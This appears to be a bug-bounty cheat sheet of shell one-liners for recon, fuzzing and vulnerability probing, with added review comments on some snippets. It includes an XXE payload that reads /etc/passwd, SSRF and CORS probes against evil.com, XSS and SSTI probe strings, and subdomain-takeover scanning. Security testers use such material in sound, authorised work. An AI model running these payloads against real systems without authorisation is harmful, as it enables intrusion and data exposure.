100. CORS (Cross-Origin Resource Sharing) testing
curl -I -H 'Origin: https://evil.com' 'https://target.com/api.php'
101. Blind SSRF (Server-Side Request Forgery) testing with time-based payloads
time curl -s 'https://target.com/api.php?url=http://evil.com&secret_token=123' -H 'X-Forwarded-For: 127.0.0.1'
102. JWT (JSON Web Token) testing with jwt_tool
jwt_tool.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c -k secret
103. GraphQL testing with gqlmap
gqlmap.py -u 'https://target.com/graphql' -t GET --level 2
104. XXE (XML External Entity) injection testing with Burp Suite
curl -d '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>' 'https://target.com/xxe.php' | base64 -w 0 | pbcopy
Then paste the base64-encoded request into the "Paste from clipboard" feature in Burp Suite.
105. API testing with HTTPie
http https://target.com/api/v1/users/1 Authorization:'Bearer JWT_TOKEN'
106. HTML injection testing
curl -d '<script>alert("XSS")</script>' 'https://target.com/comment.php'

=========================================================================================================================================



107.Scanning XSS from host / from @cihanmehmet in awesome-oneliner-bugbounty
▶ gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee result.txt

108.Automating XSS using Dalfox, GF and Waybackurls
▶ cat test.txt | gf xss | sed ‘s/=.*/=/’ | sed ‘s/URL: //’ | tee testxss.txt ; dalfox file testxss.txt -b yours-xss-hunter-domain(e.g yours.xss.ht)
109.Find XSS and Blind XSS, and send every request to burpsuite for more manual testing
▶ dalfox file hosts --mining-dom  --deep-domxss --ignore-return -b 'YOURS.xss.ht' --follow-redirects --proxy http://127.0.0.1:8080
110.dalfox scan to bugbounty targets / from KingOfBugBountyTips
▶ wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @
11.Recon subdomains and gau to search vuls DalFox / from KingOfBugBountyTips
▶ assetfinder testphp.vulnweb.com | gau |  dalfox pipe




Content Discovery/Recon :
Using dns.bufferover.run
curl -s https://dns.bufferover.run/dns?q=.example.com |jq -r .FDNS_A[]|cut -d',' -f2|sort -u
Using Crt.sh
curl -s https://dns.bufferover.run/dns?q=.hackerone.com |jq -r .FDNS_A[]|cut -d',' -f2|sort -u
Using Certspotter
curl https://certspotter.com/api/v0/certs\?domain\=example.com | jq '.[].dns_names[]' | sed 's/\"//g' | sed 's/\*\.//g' | uniq
Using Certspotter (With port scanning)
curl https://certspotter.com/api/v0/certs\?domain\=example.com | jq '.[].dns_names[]' | sed 's/\"//g' | sed 's/\*\.//g' | uniq | dig +short -f - | uniq | nmap -T5 -Pn -sS -i - -p 80,443,21,22,8080,8081,8443 --open -n -oG -
Sublist3r One Liner
. <(cat domains | xargs -n1 -i{} python sublist3r.py -d {} -o {}.txt)
Grab Titles of webpages
for i in $(cat Webservers.txt ); do echo "$i | $(curl --connect-timeout 0.5 $i -so - | grep -iPo '(?<=<title>)(.*)(?=</title>)')"; done
Enumerate hosts from SSL Certificate
echo | openssl s_client -connect https://targetdomain.com:443 | openssl x509 -noout -text | grep DNS
Google DNS via HTTPS
echo "targetdomain.com" | xargs -I domain proxychains curl -s "https://dns.google.com/resolve?name=domain&type=A" | jq .
CommonCrawl to find endpoints on a site
echo "targetdomain.com" | xargs -I domain curl -s "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.domain&output=json" | jq -r .url | sort -u
Using WebArchive
curl -s "http://web.archive.org/cdx/search/cdx?url=*.hackerone.com/*&output=text&fl=original&collapse=urlkey" |sort| sed -e 's_https*://__' -e "s/\/.*//" -e 's/:.*//' -e 's/^www\.//' | uniq
Using ThreatCrowd
curl https://www.threatcrowd.org/searchApi/v2/domain/report/?domain=hackerone.com |jq .subdomains |grep -o '\w.*hackerone.com'
Using Hackertarget
curl https://api.hackertarget.com/hostsearch/?q=hackerone.com | grep -o '\w.*hackerone.com'
Bruteforce Subdomains
while read sub; do if host "$sub.example.com" &> /dev/null; then echo "$sub.example.com"; fi; done < wordslist.txt
Assetfinder
assetfinder http://hackerone.com > recon.txt; for d in $(<recon.txt); do $(cutycapt --url=$d --out=$d.jpg --max-wait=100000); done
Find Domains that have "xyz" in whois
@thevillagehacker
# Reverse-whois via viewdns.info: print the first cell of each result row.
# Splitting on both < and > makes the cell text field 5 of "<tr><td>X</td>".
ua="User-Agent: Mozilla"
curl -H "$ua" "viewdns.info/reversewhois/?..." | grep -Po "<tr><td>[^<]+</td>" | awk -F'[<>]' '{print $5}'
Get Content-Type
@thevillagehacker
# Archived .js URLs that currently return 200 with a JavaScript content type.
gau <<< 'abc.com' | grep '\.js$' | httpx -status-code -mc 200 -content-type | grep 'application/javascript'
Fuzz with FFUF
@thevillagehacker
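# Fuzz paths on every live host assetfinder finds for att.com.
# The host is handed to sh as a positional argument ("$1") instead of
# being substituted into the -c string, so a hostname cannot inject
# shell syntax. Note the sed: in BRE a leading "*" is literal, so this
# replaces "*" plus the following character with a space (presumably
# meant to drop "*." wildcard prefixes).
assetfinder http://att.com | sed 's#*.# #g' | httpx -silent -threads 10 \
  | xargs -I@ sh -c 'ffuf -w path.txt -u "$1/FUZZ" -mc 200 -H "Content-Type: application/json" -t 150 -H "X-Forwarded-For:127.0.0.1"' _ @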
Open redirect check
@thevillagehacker
# Live archived URLs that match the gf "redirect" patterns, deduped by anew.
waybackurls <<< "domain" | httpx -silent -timeout 2 -threads 100 | gf redirect | anew
Extract URLs from an .apk file
@thevillagehacker
# Decode the APK, then harvest http(s) URLs from the decoded tree,
# dropping framework/vendor noise.
apk_dir="uberAPK"
apktool -d com.uber -o "$apk_dir"
grep -Phro "(https?://)[\w\,-/]+[\"\']" "$apk_dir"/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemes.android\|google\|goo.gl"
Information Disclosure
@thevillagehacker
# Probe each host for Apache server-status and a JBoss-style web console,
# reporting status code and body length.
httpx -path '//server-status?full=true' -status-code -content-length < host.txt
httpx -ports 80,443,8009,8080,8081,8090,8180,8443 -path /web-console/ -status-code -content-length < host.txt
Find xmlrpc.php in a single shot
@thevillagehacker
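# Probe each live host for xmlrpc.php (typically WordPress) and keep the
# ones whose response mentions "XML-RPC". read -r and quoting keep odd
# URLs intact; printf replaces echo -e, which interpreted backslash
# sequences inside the fetched HTML.
assetfinder --subs-only < domain.txt | httprobe | while IFS= read -r url; do
  xml=$(curl -s -L "$url/xmlrpc.php" | grep 'XML-RPC')
  printf '%s -> %s\n' "$url" "$xml"
done | grep 'XML-RPC' | sort -u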
Reflected XSS
@thevillagehacker
# Collect live hosts, pull archived URLs that match the gf "xss" patterns
# and let kxss check which parameters reflect; separately crawl with
# gospider, keep https URLs with a query string and swap each value for
# the probe string.
subfinder -d abc.com | httprobe -c 100 > target.txt
waybackurls < target.txt | gf xss | kxss
# NOTE(review): the unescaped '.' in grep -v ".js" also drops URLs that
# merely contain e.g. "xjs"; kept as written.
gospider -a -s abc.com -t 3 -c 100 | tr ' ' '\n' | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22><svg%20onload=confirm(1);>'
SSTI to RCE
@thevillagehacker
 # Replace every query value with a template-expression probe, then replay
 # each URL through the local proxy so the responses can be inspected.
 target="http://target.com"
 waybackurls "$target" | qsreplace "abc{{9*9}}" > fuzz.txt
 ffuf -u FUZZ -w fuzz.txt -replay-proxy http://127.0.0.1:8080/
Then search for the string abc81 in Burp Suite's search and check the responses.
Check for open redirect / SSRF with waybackurls
@thevillagehacker
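# Archived URLs whose query string carries a URL-encoded URL (http%.. / https%..).
# The original opened the grep pattern with a typographic quote (‘), which
# leaves the quote unbalanced; it is a plain single quote now.
waybackurls target[.]com | grep 'http%\|https%'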
 Note: you can replace the URLs you find with your own and look for an open redirect, SSRF, or something else. Analytics URLs can be filtered out with grep -v. If the target uses OAuth with a redirect_uri pointing at target/, that is an easy account takeover.
Searching for endpoints, by apks
@thevillagehacker
# Decode the APK, then harvest http(s) URLs from the decoded tree,
# dropping framework/vendor noise.
apk_dir="uberAPK"
apktool -d com.uber -o "$apk_dir"
grep -Phro "(https?://)[\w\,-/]+[\"\']" "$apk_dir"/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemes.android\|google\|goo.gl"
Fuzz all js files from the target
@thevillagehacker
# NOTE(review): this one-liner is truncated in the source — the second
# "sh -c" has no command string and fails as written. The first stage
# reads hosts from the file "domain" and prints those that accept a TCP
# connection on 443 (nc -z), 500 probes in parallel.
xargs -P 500 -a domain -I@ sh -c 'nc -w1 -z -v @ 443 2>/dev/null && echo @' | xargs -I@ -P10 sh -c 


Get Subdomains With synapsint.com
@pikpikcu

# Subdomains of domain.com as reported by synapsint.com's report form.
grep -oE "[a-zA-Z0-9._-]+\.domain.com" <(curl -s -X POST https://synapsint.com/report.php -d "name=https%3A%2F%2Fdomain.com") | sort -u
Get Subdomains from crt.sh
@vict0ni

# crt.sh certificate-transparency search for %.$1; wildcard prefixes stripped.
domain=$1
curl -s "https://crt.sh/?q=%25.${domain}&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
Sort & Test Domains from Recon.dev
@stokfedrik

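# recon.dev search, with the results probed by httpx. The API key is read
# from the environment so it does not end up in the command line / shell
# history; RECON_DEV_KEY is a name chosen for this snippet, and the
# original placeholder "apikey" remains the default.
curl -s "https://recon.dev/api/search?key=${RECON_DEV_KEY:-apikey}&domain=example.com" | jq -r '.[].rawDomains[]' | sed 's/ //g' | sort -u | httpx -silent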
Subdomain Bruteforcer with FFUF
@GochaOqradze

# Subdomain brute force with ffuf; print the URL column of the "| URL |" lines.
ffuf -u https://FUZZ.rootdomain -w jhaddixall.txt -v | awk '/\| URL \|/ {print $4}'
Find All Allocated IP ranges for ASN given an IP address
wains.be

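# Routes registered in RADB under the origin ASN of the IP given as $1.
# "$1" is quoted; the first origin: value is taken with awk's exit instead
# of grep | awk | head.
asn=$(whois -h whois.radb.net "$1" | awk '/origin:/ {print $NF; exit}')
whois -h whois.radb.net -i origin -T route "$asn" | grep -w "route:" | awk '{print $NF}' | sort -n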
Extract IPs from a File
@emenalf

# Print every dotted-quad IPv4 address found in file.txt (each octet 0-255).
octet='(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)'
grep -Eo "${octet}\.${octet}\.${octet}\.${octet}" file.txt
Ports Scan without CloudFlare
@dwisiswant0

# Resolve subfinder results, filter with cf-check, port-scan the rest
# with naabu, then keep the hosts that answer HTTP(S).
subfinder -silent -d uber.com \
  | filter-resolved \
  | cf-check \
  | sort -u \
  | naabu -rate 40000 -silent -verify \
  | httprobe
Create Custom Wordlists
@tomnomnom

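# Build a wordlist from a domain's URL keys and path segments (gau +
# unfurl), then a second one from page text. The original ran
# "rm ends.txt | sed -i ..." as a pipeline, so the steps were not
# sequential; they are now, and the input file is piped instead of cat'ed.
domain="domain.com"
gau "$domain" | unfurl -u keys | tee -a wordlist.txt
gau "$domain" | unfurl -u paths | tee -a ends.txt
sed 's#/#\n#g' ends.txt | sort -u | tee -a wordlist.txt | sort -u
rm ends.txt
# NOTE(review): "\.wolf" is probably meant to be "\.woff"; left as written.
sed -i -e 's/\.css\|\.png\|\.jpeg\|\.jpg\|\.svg\|\.gif\|\.wolf\|\.bmp//g' wordlist.txt
httprobe < domains.txt | xargs curl | tok | tr '[:upper:]' '[:lower:]' | sort -u | tee -a words.txt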
Extract Juicy Information
@Prial Islam Khan

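# For each domain in domains.txt, fetch its OTX URL list and keep the
# "url" values. A read -r loop replaces for/$(cat), which split lines on
# whitespace; grep -E replaces the deprecated egrep.
while IFS= read -r sub; do
  /usr/bin/gron "https://otx.alienvault.com/otxapi/indicator/hostname/url_list/${sub}?limit=100&page=1" \
    | grep "\burl\b" | gron --ungron | jq | grep -Ewi 'url' | awk '{print $2}' | sed 's/"//g' | sort -u | tee -a file.txt
done < domains.txt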
Find Subdomains TakeOver
@hahwul

# Gather subdomains from three sources into ./domains, then run subjack
# against them and append its findings to ./takeover.
subfinder -d {target} >> domains
assetfinder -subs-only {target} >> domains
amass enum -norecursive -noalts -d {target} >> domains
subjack -w domains -t 100 -timeout 30 -ssl -c ~/go/src/github.com/haccer/subjack/fingerprints.json -v 3 >> takeover
Get multiple targets' custom URLs from ParamSpider
@hahwul

# Run ParamSpider once per domain in ./domains, one output directory each.
xargs -I % python3 ~/tool/ParamSpider/paramspider.py -l high -o ./spidering/paramspider/% -d % < domains
URLs Probing with cURL + Parallel
@akita_zen


# Probe each URL with curl (50 in parallel), printing status, size and
# the effective URL; bodies are discarded.
fmt='Status:%{http_code}\t  Size:%{size_download}\t %{url_effective}\n'
parallel -j50 -q curl -w "$fmt" -o /dev/null -sk < alive-subdomains.txt
Dump In-scope Assets from chaos-bugbounty-list
@dwisiswant0

# Every in-scope domain from projectdiscovery's chaos bug-bounty list.
list_url="https://github.com/projectdiscovery/public-bugbounty-programs/raw/master/chaos-bugbounty-list.json"
curl -sL "$list_url" | jq -r '.programs[].domains | to_entries | .[].value'
Dump In-scope Assets from bounty-targets-data
@dwisiswant0

HackerOne Programs
# HackerOne in-scope assets as "identifier<TAB>type".
src="https://github.com/arkadiyt/bounty-targets-data/blob/master/data/hackerone_data.json?raw=true"
curl -sL "$src" | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type] | @tsv'
BugCrowd Programs
# Bugcrowd in-scope targets as "target<TAB>type".
src="https://github.com/arkadiyt/bounty-targets-data/raw/master/data/bugcrowd_data.json"
curl -sL "$src" | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'
Intigriti Programs
# Intigriti in-scope targets as "endpoint<TAB>type".
src="https://github.com/arkadiyt/bounty-targets-data/raw/master/data/intigriti_data.json"
curl -sL "$src" | jq -r '.[].targets.in_scope[] | [.endpoint, .type] | @tsv'
YesWeHack Programs
# YesWeHack in-scope targets as "target<TAB>type".
src="https://github.com/arkadiyt/bounty-targets-data/raw/master/data/yeswehack_data.json"
curl -sL "$src" | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'
HackenProof Programs
# HackenProof in-scope targets as "target<TAB>type<TAB>instruction".
src="https://github.com/arkadiyt/bounty-targets-data/raw/master/data/hackenproof_data.json"
curl -sL "$src" | jq -r '.[].targets.in_scope[] | [.target, .type, .instruction] | @tsv'
Federacy Programs
# Federacy in-scope targets as "target<TAB>type".
src="https://github.com/arkadiyt/bounty-targets-data/raw/master/data/federacy_data.json"
curl -sL "$src" | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'
Get all the urls out of a sitemap.xml
@healthyoutlet


# Pretty-print the sitemap and strip the <loc> tags from the URL lines.
curl -s domain.com/sitemap.xml | xmllint --format - | grep loc | sed -E 's|</?loc>||g'
Pure bash Linkfinder
@ntrzz

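# LinkFinder driver: collect .js links from the page at $1, run
# linkfinder on each, keep lines matching $2 and drop those matching $3.
# Quoting stops word-splitting/globbing of the URL and patterns, read -r
# keeps backslashes, sort -u replaces sort | uniq, and rm -f replaces
# rm -rf for a plain file.
# NOTE(review): grep ".js" has an unescaped '.', so it also keeps URLs
# that merely contain "xjs"; left as written.
curl -s "$1" | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort -u | grep ".js" > jslinks.txt
while IFS= read -r link; do
  python linkfinder.py -i "$link" -o cli
done < jslinks.txt | grep "$2" | grep -v "$3" | sort -n | uniq
rm -f jslinks.txt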
Extract Endpoints from swagger.json
@zer0pwn

# Endpoint paths declared in a Swagger 2.0 document.
spec="https://domain.tld/v2/swagger.json"
curl -s "$spec" | jq '.paths | keys[]'
CORS Misconfiguration
@manas_hunter


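# Check each archived URL for a CORS policy that echoes an arbitrary Origin.
# The original piped a variable assignment into "if" and contained a bare
# "[Potentional CORS Found]" token, so it did not run as written; the
# response headers are now piped straight into grep -q.
# -I requests headers only; -X GET overrides the HEAD method while curl
# still prints just the headers.
site="https://example.com"
gau "$site" | while IFS= read -r url; do
  if curl -s -I -H "Origin: https://evil.com" -X GET "$url" | grep -q 'https://evil.com'; then
    echo "[Potential CORS Found] $url"
  else
    echo "Nothing on $url"
  fi
done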
Find Hidden Servers and/or Admin Panels
@rez0__

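# Virtual-host brute force: fuzz the Host header against one IP/URL.
# The original URL "https://target .com" had a stray space in it.
ffuf -c -u https://target.com -H "Host: FUZZ" -w vhost_wordlist.txt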
Recon using api.recon.dev
@z0idsec

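# recon.dev subdomain search. "jg" was a typo for jq. -w appends the HTTP
# status code after the JSON body, which jq reads as a second value;
# ".[]?" iterates only when the value is an array, so the trailing number
# no longer aborts jq.
curl -s -w "\n%{http_code}" "https://api.recon.dev/search?domain=site.com" | jq '.[]? | .domain'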
Find live host/domain/assets
@YashGoti

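# Live hosts: subfinder results that answer 200 after redirects, reduced
# to their host part. subfinder -d expects a bare domain name, not a URL.
subfinder -d tesla.com -silent | httpx -silent -follow-redirects -mc 200 | cut -d '/' -f3 | sort -u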
XSS without gf
@HacktifyS

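# Replace each archived query value with the probe string and report URLs
# whose response reflects it verbatim. read -r and quoting keep URLs
# intact (the original also captured a stray "do" variable); echo printed
# the "\033[0;31m" escape literally, so printf now emits it as colour.
waybackurls testphp.vulnweb.com | grep '=' | qsreplace '"><script>alert(1)</script>' | while IFS= read -r host; do
  curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && printf '%s \033[0;31mVulnerable\033[0m\n' "$host"
done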
Extract endpoints from APK files
@laughface809


# Extract endpoints from an APK with apkurlgrep; replace the path with the file to inspect.
apkurlgrep -a path/to/file.apk
Get Subdomains from IPs
@laughface809

# Run HostHunter over a list of IPs, saving results to vhosts.txt.
# NOTE(review): "<target-ips.txt>" is placeholder notation — the angle
# brackets are not shell syntax here and must be replaced with the real filename.
python3 hosthunter.py <target-ips.txt> > vhosts.txt
webscreenshot
@laughface809

# Screenshot every URL in list.txt with 40 workers.
python webscreenshot.py -i list.txt -w 40
Remove duplicate URLs and parameter combinations
@laughface809

# qsreplace -a: drop URLs that repeat an already-seen parameter combination.
qsreplace -a < urls.txt
Gather domains from content-security-policy:
@geeknik

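# Pull host names out of the site's Content-Security-Policy header.
# "-silent" is not a curl option: it appears to be parsed as the bundle
# -s -i -l -e nt, and only the accidental -i put the headers on stdout.
# -s -i does that explicitly, "$domain" is quoted, and the header match
# is case-insensitive since HTTP/1.1 servers may send
# "Content-Security-Policy:".
curl -s -i "https://$domain" | awk 'tolower($0) ~ /^content-security-policy:/' | grep -Eo "[a-zA-Z0-9./?=_-]*" | sed -e '/\./!d' -e '/[^A-Za-z0-9._-]/d' -e 's/^\.//' | sort -u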

